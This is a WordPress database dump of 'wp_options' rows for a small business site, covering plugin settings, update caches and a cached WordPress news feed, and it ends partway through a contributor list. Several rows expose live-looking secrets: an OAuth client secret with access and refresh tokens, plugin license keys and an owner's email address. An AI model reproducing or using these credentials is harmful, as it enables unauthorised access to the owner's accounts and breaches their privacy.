INSERT INTO `wp_options` VALUES("449", "wp_maxv_st_settings", "a:31:{s:15:\"share_old_posts\";s:0:\"\";s:20:\"share_old_posts_date\";s:10:\"2015-02-08\";s:17:\"share_posts_order\";s:6:\"newest\";s:20:\"share_excerpt_length\";i:300;s:24:\"share_min_content_length\";i:50;s:13:\"license_email\";s:17:\"Keifersfl@aol.com\";s:11:\"license_key\";s:36:\"2442f209-c28e-0904-2972-703c02407a6d\";s:20:\"share_posts_or_pages\";s:0:\"\";s:19:\"share_blog_category\";s:8:\"Business\";s:24:\"share_auto_share_enabled\";s:5:\"false\";s:33:\"share_auto_share_external_enabled\";s:0:\"\";s:16:\"share_ping_posts\";s:2:\"on\";s:26:\"share_use_backlinksindexer\";s:2:\"on\";s:30:\"share_use_backlinksindexer_key\";s:8:\"1f79e6b5\";s:27:\"wp_maxv_st_share_post_types\";a:1:{s:4:\"post\";s:2:\"on\";}s:18:\"videos_rand_factor\";s:0:\"\";s:18:\"images_rand_factor\";s:0:\"\";s:23:\"share_blog_alt_category\";s:0:\"\";s:19:\"share_timeframe_mon\";s:0:\"\";s:19:\"share_timeframe_tue\";s:0:\"\";s:19:\"share_timeframe_wed\";s:0:\"\";s:19:\"share_timeframe_thu\";s:0:\"\";s:19:\"share_timeframe_fri\";s:0:\"\";s:19:\"share_timeframe_sat\";s:0:\"\";s:19:\"share_timeframe_sun\";s:0:\"\";s:14:\"share_timezone\";s:14:\"Africa/Abidjan\";s:28:\"slm_custom_timeframe_enabled\";s:5:\"false\";s:25:\"slm_custom_timeframe_from\";s:0:\"\";s:23:\"slm_custom_timeframe_to\";s:0:\"\";s:15:\"youtube_enabled\";s:0:\"\";s:14:\"images_enabled\";s:0:\"\";}", "yes");
INSERT INTO `wp_options` VALUES("451", "external_updates-social-link-machine", "O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1423412248;s:14:\"checkedVersion\";s:6:\"0.1.37\";s:6:\"update\";O:8:\"stdClass\":6:{s:2:\"id\";i:0;s:4:\"slug\";s:19:\"social-link-machine\";s:7:\"version\";s:6:\"0.1.37\";s:8:\"homepage\";N;s:12:\"download_url\";s:75:\"https://s3-us-west-2.amazonaws.com/wpslm/downloads/social-link-machine_.zip\";s:14:\"upgrade_notice\";N;}}", "yes");
INSERT INTO `wp_options` VALUES("464", "wp_maxv_st_debug_schedule_log", "executeSocialTriggerTask 1<br/>\nexecuteSocialTriggerTask 2<br/>\n", "yes");
INSERT INTO `wp_options` VALUES("529", "_site_transient_timeout_browser_2d7340a61b406d3009da600c8dd6a179", "1423756615", "yes");
INSERT INTO `wp_options` VALUES("530", "_site_transient_browser_2d7340a61b406d3009da600c8dd6a179", "a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"40.0.2214.94\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}", "yes");
INSERT INTO `wp_options` VALUES("543", "_transient_timeout_plugin_slugs", "1423498226", "no");
INSERT INTO `wp_options` VALUES("544", "_transient_plugin_slugs", "a:11:{i:0;s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";i:1;s:33:\"dashnex-plugin/dashnex-plugin.php\";i:2;s:25:\"duplicator/duplicator.php\";i:3;s:35:\"EzMobileRedirectGenerator/index.php\";i:4;s:36:\"google-sitemap-generator/sitemap.php\";i:5;s:47:\"heatmaptracker-pro-developer/heatmaptracker.php\";i:6;s:39:\"p1-content-magnet/p1-content-magnet.php\";i:7;s:32:\"paper-template/papertemplate.php\";i:8;s:30:\"social-link-machine/plugin.php\";i:9;s:25:\"ultimate-tinymce/main.php\";i:10;s:27:\"wp-super-cache/wp-cache.php\";}", "no");
INSERT INTO `wp_options` VALUES("598", "_site_transient_timeout_browser_79cd6bece4355aafc7f3811eddbc46a9", "1423830440", "yes");
INSERT INTO `wp_options` VALUES("599", "_site_transient_browser_79cd6bece4355aafc7f3811eddbc46a9", "a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"40.0.2214.111\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}", "yes");
INSERT INTO `wp_options` VALUES("691", "_dashnex_db_meta_key", "a:1:{s:7:\"dashnex\";i:78;}", "yes");
INSERT INTO `wp_options` VALUES("692", "_dashnex_client", "O:20:\"DashNex\\OAuth\\Client\":3:{s:5:\"\0*\0id\";s:56:\"17555_39zkiub3tqqs88gock4sccw0c0cwk880ow84ww08wo8wkkk4ko\";s:9:\"\0*\0secret\";s:49:\"2841t1ggid1cscsg48occgs0kks48kw8wsocw0g40ss0o440g\";s:15:\"\0*\0redirect_url\";s:73:\"http://tallahassee.themobilemechanics.org/wp-admin/admin.php?page=dashnex\";}", "yes");
INSERT INTO `wp_options` VALUES("693", "_dashnex_token", "O:19:\"DashNex\\OAuth\\Token\":3:{s:9:\"\0*\0access\";s:86:\"YjlkMzcyZjg5MzI1OWExYWViZDlmNDQ4MzBkNmQxZWE5ZDM2MTg2YjM5Yjk3NWUzYzU0OTA3NjA2MjJiN2E2Yg\";s:10:\"\0*\0refresh\";s:86:\"NDdhNTk3Mzg1YTc1MTI2MmNjNzA2NjI3ZTI1M2Y2ZTkyOTI3MjlkZDhlOGNmYWQ3N2U3YzRlZTIyMzkwMjJmNQ\";s:10:\"\0*\0expires\";O:8:\"DateTime\":3:{s:4:\"date\";s:26:\"2025-02-04 02:35:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}}", "yes");
INSERT INTO `wp_options` VALUES("694", "_p1cm_option_key", "a:3:{s:10:\"stop_words\";s:574:\"a,able,about,across,after,all,almost,also,am,among,an,and,any,are,as,at,be,because,been,but,by,can,cannot,could,dear,define,did,do,does,either,else,ever,every,for,from,get,got,had,has,have,he,her,hers,him,his,how,however,i,if,in,into,is,it,its,just,least,let,like,likely,may,me,might,more,most,must,my,neither,no,nor,not,of,off,often,on,only,or,other,our,own,rather,said,say,says,she,should,since,so,some,tags,than,that,the,their,them,then,there,these,they,this,tis,to,too,twas,tweet,us,wants,was,we,were,what,when,where,which,while,who,whom,why,will,with,would,yet,you,your\";s:15:\"min_word_length\";s:1:\"4\";s:6:\"locale\";s:2:\"US\";}", "yes");
INSERT INTO `wp_options` VALUES("790", "viberspy_pro_plugin", "a:18:{s:7:\"version\";s:5:\"1.1.2\";s:12:\"dbtable_name\";s:8:\"viberspy\";s:19:\"dbtable_name_clicks\";s:15:\"viberspy_clicks\";s:18:\"dbtable_name_mmove\";s:14:\"viberspy_mmove\";s:19:\"dbtable_name_scroll\";s:15:\"viberspy_scroll\";s:20:\"dbtable_name_popular\";s:16:\"viberspy_popular\";s:17:\"opt_record_status\";b:1;s:11:\"license_key\";s:21:\"mvyli-0b90657767-j19o\";s:7:\"license\";s:40:\"96609505879e8e779c3477d14038adc8a87484c4\";s:14:\"opt_record_all\";s:4:\"true\";s:18:\"opt_record_special\";a:0:{}s:20:\"opt_record_mousemove\";s:1:\"1\";s:21:\"opt_record_pagescroll\";s:1:\"1\";s:19:\"opt_record_interval\";s:1:\"1\";s:23:\"opt_record_kill_session\";s:3:\"100\";s:15:\"opt_record_user\";s:1:\"1\";s:13:\"opt_record_tz\";s:16:\"America/New_York\";s:15:\"opt_record_logo\";s:7:\"default\";}", "yes");
INSERT INTO `wp_options` VALUES("791", "external_updates-heatmaptracker", "O:8:\"stdClass\":3:{s:9:\"lastCheck\";i:1423309782;s:14:\"checkedVersion\";s:5:\"1.1.2\";s:6:\"update\";O:8:\"stdClass\":6:{s:2:\"id\";i:0;s:4:\"slug\";s:8:\"viberspy\";s:7:\"version\";s:5:\"1.1.2\";s:8:\"homepage\";s:15:\"PLUGIN_HOMEPAGE\";s:12:\"download_url\";s:82:\"http://heatmaptracker.com/viberspy-auto-update-v2/heatmaptracker-pro-developer.zip\";s:14:\"upgrade_notice\";s:15:\"Test autoupdate\";}}", "yes");
INSERT INTO `wp_options` VALUES("837", "_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a", "1423371556", "yes");
INSERT INTO `wp_options` VALUES("838", "_site_transient_poptags_40cd750bba9870f18aada2478b24840a", "a:40:{s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";s:4:\"4916\";}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"Post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";s:4:\"3078\";}s:6:\"plugin\";a:3:{s:4:\"name\";s:6:\"plugin\";s:4:\"slug\";s:6:\"plugin\";s:5:\"count\";s:4:\"3022\";}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";s:4:\"2529\";}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";s:4:\"2346\";}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";s:4:\"1892\";}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";s:4:\"1729\";}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";s:4:\"1680\";}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";s:4:\"1678\";}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";s:4:\"1676\";}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";s:4:\"1612\";}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";s:4:\"1609\";}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";s:4:\"1505\";}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"Facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";s:4:\"1322\";}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";s:4:\"1276\";}s:9:\"wordpress\";a:3:{s:4:\"name\";s:9:\"wordpress\";s:4:\"slug\";s:9:\"wordpress\";s:5:\"count\";s:4:\"1175\";}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";s:4:\"1171\";}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";s:4:\"1083\";}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";s:4:\"1079\";}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";s:3:\"918\";}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";s:3:\"905\";}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";s:3:\"874\";}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";s:3:\"843\";}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";s:3:\"837\";}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";s:3:\"794\";}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";s:3:\"758\";}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"AJAX\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";s:3:\"748\";}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";s:3:\"709\";}s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";s:3:\"700\";}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";s:3:\"692\";}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";s:3:\"682\";}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";s:3:\"657\";}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";s:3:\"649\";}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";s:3:\"642\";}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";s:3:\"642\";}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";s:3:\"623\";}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";s:3:\"620\";}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";s:3:\"605\";}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"Share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";s:3:\"600\";}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";s:3:\"593\";}}", "yes");
INSERT INTO `wp_options` VALUES("843", "_site_transient_update_plugins", "O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1423411785;s:7:\"checked\";a:11:{s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:7:\"2.2.5.1\";s:33:\"dashnex-plugin/dashnex-plugin.php\";s:5:\"1.5.1\";s:25:\"duplicator/duplicator.php\";s:6:\"0.5.12\";s:35:\"EzMobileRedirectGenerator/index.php\";s:7:\"2.01.06\";s:36:\"google-sitemap-generator/sitemap.php\";s:5:\"4.0.8\";s:47:\"heatmaptracker-pro-developer/heatmaptracker.php\";s:5:\"1.1.2\";s:39:\"p1-content-magnet/p1-content-magnet.php\";s:5:\"2.0.1\";s:32:\"paper-template/papertemplate.php\";s:5:\"2.1.0\";s:30:\"social-link-machine/plugin.php\";s:6:\"0.1.37\";s:25:\"ultimate-tinymce/main.php\";s:3:\"5.7\";s:27:\"wp-super-cache/wp-cache.php\";s:5:\"1.4.2\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:5:{s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"520\";s:4:\"slug\";s:19:\"all-in-one-seo-pack\";s:6:\"plugin\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:11:\"new_version\";s:7:\"2.2.5.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/all-in-one-seo-pack/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/all-in-one-seo-pack.zip\";}s:25:\"duplicator/duplicator.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"22600\";s:4:\"slug\";s:10:\"duplicator\";s:6:\"plugin\";s:25:\"duplicator/duplicator.php\";s:11:\"new_version\";s:6:\"0.5.12\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/duplicator/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/duplicator.0.5.12.zip\";}s:36:\"google-sitemap-generator/sitemap.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:24:\"google-sitemap-generator\";s:6:\"plugin\";s:36:\"google-sitemap-generator/sitemap.php\";s:11:\"new_version\";s:5:\"4.0.8\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/google-sitemap-generator/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/google-sitemap-generator.4.0.8.zip\";}s:25:\"ultimate-tinymce/main.php\";O:8:\"stdClass\":6:{s:2:\"id\";s:5:\"27096\";s:4:\"slug\";s:16:\"ultimate-tinymce\";s:6:\"plugin\";s:25:\"ultimate-tinymce/main.php\";s:11:\"new_version\";s:3:\"5.7\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/ultimate-tinymce/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/ultimate-tinymce.5.7.zip\";}s:27:\"wp-super-cache/wp-cache.php\";O:8:\"stdClass\":7:{s:2:\"id\";s:4:\"1221\";s:4:\"slug\";s:14:\"wp-super-cache\";s:6:\"plugin\";s:27:\"wp-super-cache/wp-cache.php\";s:11:\"new_version\";s:5:\"1.4.2\";s:14:\"upgrade_notice\";s:91:\"Fixed &quot;acceptable file list&quot; and no caching for GET queries bugs in last release.\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/wp-super-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wp-super-cache.1.4.2.zip\";}}}", "yes");
INSERT INTO `wp_options` VALUES("875", "_site_transient_timeout_theme_roots", "1423413585", "yes");
INSERT INTO `wp_options` VALUES("876", "_site_transient_theme_roots", "a:5:{s:22:\"RockStarLeadTheme-v2-4\";s:7:\"/themes\";s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentyfourteen\";s:7:\"/themes\";s:14:\"twentythirteen\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}", "yes");
INSERT INTO `wp_options` VALUES("877", "_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca", "1423454988", "no");
INSERT INTO `wp_options` VALUES("878", "_transient_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca", "a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:57:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"http://wordpress.org/?v=4.2-alpha-31368\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"WordPress 4.1 “Dinah”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://wordpress.org/news/2014/12/dinah/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"https://wordpress.org/news/2014/12/dinah/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 18 Dec 2014 18:35:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3386\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:360:\"Version 4.1 of WordPress, named &#8220;Dinah&#8221; in honor of jazz singer Dinah Washington, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style. Introducing Twenty Fifteen Our newest default theme, Twenty Fifteen, is [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:24552:\"<p>Version 4.1 of WordPress, named &#8220;Dinah&#8221; in honor of jazz singer <a href=\"http://wikipedia.org/wiki/Dinah_Washington\">Dinah Washington</a>, is available for download or update in your WordPress dashboard. New features in WordPress 4.1 help you focus on your writing, and the new default theme lets you show it off in style.</p>\n<hr />\n<h2 style=\"text-align: center\">Introducing Twenty Fifteen</h2>\n<p><img class=\"aligncenter size-large wp-image-3389\" src=\"https://wordpress.org/news/files/2014/12/2015-laptop-1024x533.png\" alt=\"2015-laptop\" width=\"692\" height=\"360\" /></p>\n<h3>Our newest default theme, Twenty Fifteen, is a blog-focused theme designed for clarity.</h3>\n<p><img class=\"alignright wp-image-3426 size-medium\" src=\"https://wordpress.org/news/files/2014/12/2015-phones-languages-small-300x250.png\" alt=\"\" width=\"300\" height=\"250\" />Twenty Fifteen has flawless language support, with help from <a href=\"https://www.google.com/get/noto/\">Google’s Noto font family</a>.</p>\n<p>The straightforward typography is readable on any screen size.</p>\n<p>Your content always takes center stage, whether viewed on a phone, tablet, laptop, or desktop computer.</p>\n<hr />\n<h2 style=\"text-align: center\">Distraction-free writing</h2>\n<p><img class=\"aligncenter size-large wp-image-3392\" src=\"https://wordpress.org/news/files/2014/12/dfw-screen-1024x614.png\" alt=\"dfw-screen\" width=\"692\" height=\"415\" /></p>\n<h3 style=\"text-align: center\"><em>Just write.</em></h3>\n<p>Sometimes, you just need to concentrate on putting your thoughts into words. Try turning on <strong>distraction-free writing mode</strong>. When you start typing, all the distractions will fade away, letting you focus solely on your writing. All your editing tools instantly return when you need them.</p>\n<hr />\n<h2 style=\"text-align: center\">The Finer Points</h2>\n<h5><strong><img class=\"alignleft wp-image-3405\" src=\"https://wordpress.org/news/files/2014/12/icon-language2.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Choose a language</h5>\n<p>Right now, WordPress 4.1 is already translated into over forty languages, with more always in progress. You can switch to any translation on the General Settings screen.</p>\n<h5><strong><img class=\"alignleft wp-image-3406\" src=\"https://wordpress.org/news/files/2014/12/icon-logout1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Log out everywhere</h5>\n<p>If you’ve ever worried you forgot to sign out from a shared computer, you can now go to your profile and log out everywhere.</p>\n<h5><strong><img class=\"alignleft wp-image-3407\" src=\"https://wordpress.org/news/files/2014/12/icon-vine1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Vine embeds</h5>\n<p>Embedding videos from Vine is as simple as pasting a URL onto its own line in a post. See the <a href=\"https://codex.wordpress.org/Embeds\">full list</a> of supported embeds.</p>\n<h5><strong><img class=\"alignleft wp-image-3408\" src=\"https://wordpress.org/news/files/2014/12/icon-recommended1.png\" alt=\"\" width=\"80\" height=\"80\" /></strong>Plugin recommendations</h5>\n<p>The plugin installer suggests plugins for you to try. Recommendations are based on the plugins you and other users have installed.</p>\n<hr />\n<h2 style=\"text-align: center\">Under the Hood</h2>\n<h5>Complex Queries</h5>\n<p>Metadata, date, and term queries now support advanced conditional logic, like nested clauses and multiple operators — <code>A AND ( B OR C )</code>.</p>\n<h5>Customizer API</h5>\n<p>The customizer now supports conditionally showing panels and sections based on the page being previewed.</p>\n<h5><code>&lt;title&gt;</code> tags in themes</h5>\n<p><code>add_theme_support( \'title-tag\' )</code> tells WordPress to handle the complexities of document titles.</p>\n<h5>Developer Reference</h5>\n<p>Continued improvements to inline code documentation have made the <a href=\"https://developer.wordpress.org/reference/\">developer reference</a> more complete than ever.</p>\n<hr />\n<h2 style=\"text-align: center\">The Choir</h2>\n<p>This release was led by <a href=\"https://profiles.wordpress.org/johnbillion\">John Blackbourn</a>, with the help of these awesome folks. Check out some of their profiles while listening to Dinah Washington on the music service of your choice:</p>\n<a href=\"https://profiles.wordpress.org/aaroncampbell\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/akumria\">akumria</a>, <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/viper007bond\">Alex Mills (Viper007Bond)</a>, <a href=\"https://profiles.wordpress.org/tellyworth\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/collinsinternet\">Allan Collins</a>, <a href=\"https://profiles.wordpress.org/momo360modena\">Amaury Balmer</a>, <a href=\"https://profiles.wordpress.org/amruta123b\">Amruta Bhosale</a>, <a href=\"https://profiles.wordpress.org/afercia\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andg\">Andrea Gandino</a>, <a href=\"https://profiles.wordpress.org/sumobi\">Andrew Munro (sumobi)</a>, <a href=\"https://profiles.wordpress.org/nacin\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/azaozz\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/andrewryno\">Andrew Ryno</a>, <a href=\"https://profiles.wordpress.org/rarst\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/ankitgadertcampcom\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/antpb\">antpb</a>, <a href=\"https://profiles.wordpress.org/arippberger\">arippberger</a>, <a href=\"https://profiles.wordpress.org/filosofo\">Austin Matzko</a>, <a href=\"https://profiles.wordpress.org/bainternet\">Bainternet</a>, 